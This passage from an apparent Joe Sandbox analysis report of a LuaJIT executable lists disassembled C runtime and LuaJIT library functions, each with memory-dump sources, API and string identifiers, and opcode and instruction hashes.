                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C81857383C21396E764AF27804507CB7A0EB10FD4F964039CA695629ACEB9EC45CF38
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772434E50 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: $*
                                                                                                                                                                                                                              • API String ID: 3215553584-3982473090
                                                                                                                                                                                                                              • Opcode ID: 1efd0dc201afb6cb2df87b51b1532de0c6c955aa486bde14bcc7542939fd6564
                                                                                                                                                                                                                              • Instruction ID: 797b1864cc43aa533a85c242505f7c91720bdb055380f10bd3de9f61cdcc99f8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1efd0dc201afb6cb2df87b51b1532de0c6c955aa486bde14bcc7542939fd6564
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD81783383C24286EB64AF26844517CBBB4EB15B94F940135CA6967297CFBAEC41CF61
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77243551C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: $*
                                                                                                                                                                                                                              • API String ID: 3215553584-3982473090
                                                                                                                                                                                                                              • Opcode ID: 1b04caf276477af04b5d885976e20d85ac384d2c75b85c1de0808b5f727b4059
                                                                                                                                                                                                                              • Instruction ID: 68579d79ba3a91f2e706a5fa5aefc2fb3cd9faffa9d6a6b02a73b07459f55996
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b04caf276477af04b5d885976e20d85ac384d2c75b85c1de0808b5f727b4059
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8481637393C646C6EB74AF26804407CBFA1EB19B84F940135CA6D66296CFB9EC41CF21
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77244F800 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 177COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID: "$sinh
                                                                                                                                                                                                                              • API String ID: 1156100317-1232919748
                                                                                                                                                                                                                              • Opcode ID: d4441f1067829586646d6e403ae08bbbbe116838e7bd38d72df8aa425cad948a
                                                                                                                                                                                                                              • Instruction ID: 3561d821bee6cb46219836dda89558990b124dfeff26d698d065d29aeb2d61ff
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4441f1067829586646d6e403ae08bbbbe116838e7bd38d72df8aa425cad948a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7191E533D38F8188D263AB35A4413B6B364AF663D5F518327E5AE31B51DFACA543CA10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77243061C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                              • Opcode ID: 36655cc38fdb37db5713a354792fa09f1dfbcf1d55a9f2e70b9818b2607edb59
                                                                                                                                                                                                                              • Instruction ID: 0a142c77758f4d7dbe47ddcd6b292cab9544bc9933adcdefcef812ae16947a4b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36655cc38fdb37db5713a354792fa09f1dfbcf1d55a9f2e70b9818b2607edb59
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22619E33A28B45CAE710EF66D0403ADB7A0FB44B88F445225DE6D27B99CFB8D841CB50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77242EF34 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Unwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm$f
                                                                                                                                                                                                                              • API String ID: 2208346422-629598281
                                                                                                                                                                                                                              • Opcode ID: d98e7a07f294c52037bc1436f4614ab14783cba3f9a043537fabdfeef2d51ec6
                                                                                                                                                                                                                              • Instruction ID: de6197a71b23119d0d82ded14e864952908b445a5a4647077c92a24072cb55cc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d98e7a07f294c52037bc1436f4614ab14783cba3f9a043537fabdfeef2d51ec6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4519E33A3964286DB14EB17E400A29A7D5FB54B88FD28134DE2A47748DEB9EC41CF10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77244F344 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID: !$acos
                                                                                                                                                                                                                              • API String ID: 1156100317-2870037509
                                                                                                                                                                                                                              • Opcode ID: bf72582c257df8192f41e73549c3bb19c3b6f1f999e55f766029dc027c0b68c3
                                                                                                                                                                                                                              • Instruction ID: 001f5558979296823cc3d0898764ef80f050dfb2e40f45a79bf951585a21d2c5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf72582c257df8192f41e73549c3bb19c3b6f1f999e55f766029dc027c0b68c3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7661C733D38F8589E223BB365810276D764AF66394F518336E97E31A64DFACE442CA10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77244F0B8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID: !$asin
                                                                                                                                                                                                                              • API String ID: 1156100317-2188059690
                                                                                                                                                                                                                              • Opcode ID: 9e38084c10780cd626a2090b3a56498ae94656eafe0a602bef55e7ad367d1a5b
                                                                                                                                                                                                                              • Instruction ID: 7161c66f98fa04ecd69270a81d2c06c5047df8f1983f092c22222a7df625f700
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e38084c10780cd626a2090b3a56498ae94656eafe0a602bef55e7ad367d1a5b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4351C923D38F8585E213FB369811276D364AF96790F919336E97E35660DF6CA882CA10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723C8C80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 105COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free_nolock
                                                                                                                                                                                                                              • String ID: luaJIT_BC_%s$luaopen_%s$path too long
                                                                                                                                                                                                                              • API String ID: 2882679554-1241789697
                                                                                                                                                                                                                              • Opcode ID: 5dea574ca3d95739399a95e25b92153f106047c46926396060786645f98203ee
                                                                                                                                                                                                                              • Instruction ID: 7046a365b475c7351b1f521627fe6a3ede5dcb70cc0c45498f50851036692cbe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dea574ca3d95739399a95e25b92153f106047c46926396060786645f98203ee
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15510F7363CB4582D621AB16E44436AA7A1FB84B90F900576EAAD47BE9CF7CD580CF10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7724619F0 Relevance: 6.2, APIs: 4, Instructions: 159COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$_get_daylight
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 72036449-0
                                                                                                                                                                                                                              • Opcode ID: adda994bb8bdfca9ec35d26023c30ea6024999a432b5678b7d18df69566630e3
                                                                                                                                                                                                                              • Instruction ID: 9b451a74797b9c1ec87f948c7cafaa2ef6e8644cc06043a927de6fdf7205858c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: adda994bb8bdfca9ec35d26023c30ea6024999a432b5678b7d18df69566630e3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C51CDB3E3864342F768692B8011379E5A0DB40B18F995035DA2D463D5EAEEEC40CE79
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723919C0 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Context$CaptureEntryFunctionLookupRestoreUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3461063567-0
                                                                                                                                                                                                                              • Opcode ID: b1f1ff61777923e7652156cc2d336024070dc023beb6a1960c7b554b607fa398
                                                                                                                                                                                                                              • Instruction ID: 3a9a4cdb7b441e53f3bae92d4be98c222ab7fbecebeac7b0c6a53fd03f09435d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1f1ff61777923e7652156cc2d336024070dc023beb6a1960c7b554b607fa398
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF310732928BC186E760AB11E4443AAB3A1FBC9384F901036D6DD53B58DFBDD844CF10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7724608C0 Relevance: 6.1, APIs: 4, Instructions: 53synchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2321548817-0
                                                                                                                                                                                                                              • Opcode ID: 82bfb5b300ae42bcdd7f9df15edbfe6164371cee34962632e7edd6329cc57e45
                                                                                                                                                                                                                              • Instruction ID: 688dd58216e6d3acf22e8d59ba8b1c1cb4c5240926622317f66c72bc7d260c82
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82bfb5b300ae42bcdd7f9df15edbfe6164371cee34962632e7edd6329cc57e45
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D116DA3A3868282FB547B26940433DA2A1FF55BA4F945230E97D467C4DFAC9C45CF24
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772434C2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 153COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-3916222277
                                                                                                                                                                                                                              • Opcode ID: f63cfcab38654406720fb298faccf2206334f1ee504fa2844d0f42e958091265
                                                                                                                                                                                                                              • Instruction ID: 7894ed0262db72036fd85f277cbfccf5cab035dca0b696e1ed158165bd2fae9b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f63cfcab38654406720fb298faccf2206334f1ee504fa2844d0f42e958091265
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA61B77393C11286E768AF26C8553BCB7A1EB01B88F951135C66E661D6CFA9DC81CF30
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772435308 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-3916222277
                                                                                                                                                                                                                              • Opcode ID: 0644313d939e58621442b79405c350c91277a9df8c69c39d18cf3d825145f917
                                                                                                                                                                                                                              • Instruction ID: 3a14d8232d262a89a05a2b2c46ce018d1dea98d503d5ed2be606d0f0ad278781
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0644313d939e58621442b79405c350c91277a9df8c69c39d18cf3d825145f917
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B61BC7393D11186E768AF2A804423CBF65FB1DB95F941135D66A32296CFACEC41CF20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7724350F4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMONLIBRARYCODE
